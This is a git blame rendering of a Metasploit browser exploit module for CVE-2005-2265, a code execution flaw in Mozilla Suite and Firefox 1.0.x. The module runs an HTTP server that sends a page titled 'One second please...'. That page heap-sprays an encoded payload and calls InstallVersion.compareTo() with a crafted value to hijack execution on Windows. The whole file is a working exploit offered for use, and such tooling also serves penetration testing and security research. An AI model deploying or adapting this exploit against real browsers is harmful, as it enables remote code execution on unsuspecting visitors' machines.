Files
metasploit-gs/modules/exploits/multi/browser/mozilla_compareto.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

142 lines
4.3 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2009-12-06 05:50:37 +00:00
Rank = NormalRanking
2013-08-30 16:28:54 -05:00
2006-07-31 02:50:41 +00:00
#
# This module acts as an HTTP server
#
include Msf::Exploit::Remote::HttpServer::HTML
2013-08-30 16:28:54 -05:00
2025-06-20 13:20:44 +01:00
# include Msf::Exploit::Remote::BrowserAutopwn
# The version for this vuln is tricky because it affects mozilla 1.7-1.7.10
# and firefox 1.0-1.0.4, so we set minver and maxver to the outer bounds.
2025-06-20 13:20:44 +01:00
# autopwn_info({
# :ua_name => HttpClients::FF,
# :ua_minver => "1.0",
# :ua_maxver => "1.7.10",
2014-05-28 14:35:22 -05:00
# :os_name => OperatingSystems::Match::WINDOWS,
# :javascript => true,
# :rank => NormalRanking, # reliable memory corruption
# :vuln_test => "if (typeof InstallVersion != 'undefined') { is_vuln = true; }",
2025-06-20 13:20:44 +01:00
# })
2013-08-30 16:28:54 -05:00
2006-07-31 02:50:41 +00:00
def initialize(info = {})
2025-06-20 13:20:44 +01:00
super(
update_info(
info,
'Name' => 'Mozilla Suite/Firefox compareTo() Code Execution',
'Description' => %q{
This module exploits a code execution vulnerability in the Mozilla
2025-06-20 13:20:44 +01:00
Suite, Mozilla Firefox, and Mozilla Thunderbird applications. This exploit
module is a direct port of Aviv Raff's HTML PoC.
},
'License' => MSF_LICENSE,
'Author' => ['hdm', 'Aviv Raff <avivra[at]gmail.com>'],
'References' => [
['CVE', '2005-2265'],
['OSVDB', '17968'],
['BID', '14242'],
['URL', 'http://www.mozilla.org/security/announce/mfsa2005-50.html'],
2006-07-31 02:50:41 +00:00
],
2025-06-20 13:20:44 +01:00
'Payload' => {
'Space' => 400,
2006-07-31 02:50:41 +00:00
'BadChars' => "\x00",
},
2025-06-20 13:20:44 +01:00
'Platform' => %w{win},
'Targets' => [
# Tested against Firefox 1.0.4 and Mozilla 1.7.1 on
# WinXP-SP3 and Win2kAS-SP0
2025-06-20 13:20:44 +01:00
[
'Firefox < 1.0.5, Mozilla < 1.7.10, Windows',
2006-07-31 02:50:41 +00:00
{
'Platform' => 'win',
'Arch' => ARCH_X86,
'Ret' => 0x0c0c0c0c,
2006-07-31 02:50:41 +00:00
}
],
],
2025-06-20 13:20:44 +01:00
'DefaultTarget' => 0,
'DisclosureDate' => '2005-07-13',
'Notes' => {
2025-06-23 12:43:46 +01:00
'Reliability' => UNKNOWN_RELIABILITY,
'Stability' => UNKNOWN_STABILITY,
'SideEffects' => UNKNOWN_SIDE_EFFECTS
}
2025-06-20 13:20:44 +01:00
)
)
2006-07-31 02:50:41 +00:00
end
2013-08-30 16:28:54 -05:00
2006-07-31 02:50:41 +00:00
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
2013-08-30 16:28:54 -05:00
2012-04-20 13:31:42 -06:00
print_status("Sending #{self.name}")
send_response_html(cli, generate_html(p), { 'Content-Type' => 'text/html' })
2013-08-30 16:28:54 -05:00
# Handle the payload
2006-07-31 02:50:41 +00:00
handler(cli)
end
2013-08-30 16:28:54 -05:00
2006-07-31 02:50:41 +00:00
def generate_html(payload)
enc_code = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
enc_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(target.arch))
2013-08-30 16:28:54 -05:00
spray_to = sprintf("0x%.8x", target.ret)
2025-06-20 13:20:44 +01:00
spray_slide1 = Rex::Text.to_unescape([target.ret].pack('V'), Rex::Arch.endian(target.arch))
spray_slide2 = Rex::Text.to_unescape([target.ret].pack('V'), Rex::Arch.endian(target.arch))
eax_address = sprintf("0x%.8x", target.ret)
2013-08-30 16:28:54 -05:00
2006-07-31 02:50:41 +00:00
return %Q|
<html>
<head>
<!--
Copyright (C) 2005-2006 Aviv Raff (with minor modifications by HDM for the MSF module)
From: http://aviv.raffon.net/2005/12/11/MozillaUnderestimateVulnerabilityYetAgainPlusOldVulnerabilityNewExploit.aspx
Greets: SkyLined, The Insider and shutdown
2006-07-31 02:50:41 +00:00
-->
<title>One second please...</title>
<script language="javascript">
2013-08-30 16:28:54 -05:00
function BodyOnLoad()
2006-07-31 02:50:41 +00:00
{
location.href="javascript:void (new InstallVersion());";
CrashAndBurn();
};
2013-08-30 16:28:54 -05:00
#{js_heap_spray}
2006-07-31 02:50:41 +00:00
// The "Heap Spraying" is based on SkyLined InternetExploiter2 methodology
function CrashAndBurn()
2006-07-31 02:50:41 +00:00
{
// Payload - Just return..
var payLoadCode=unescape("#{enc_code}");
2013-08-30 16:28:54 -05:00
// Size of the heap blocks
2006-07-31 02:50:41 +00:00
var heapBlockSize=0x400000;
sprayHeap(payLoadCode, #{target.ret}, heapBlockSize - (payLoadCode.length + 0x38));
2013-08-30 16:28:54 -05:00
2006-07-31 02:50:41 +00:00
// Set address to fake "pdata".
var eaxAddress = #{eax_address};
2013-08-30 16:28:54 -05:00
2006-07-31 02:50:41 +00:00
// This was taken from shutdown's PoC in bugzilla
// struct vtbl { void (*code)(void); };
// struct data { struct vtbl *pvtbl; };
//
// struct data *pdata = (struct data *)(xxAddress & ~0x01);
// pdata->pvtbl->code(pdata);
//
(new InstallVersion).compareTo(new Number(eaxAddress >> 1));
}
// -->
</script>
</head>
<body onload="BodyOnLoad()">
</body>
</html>
|
end
2009-07-16 16:02:24 +00:00
end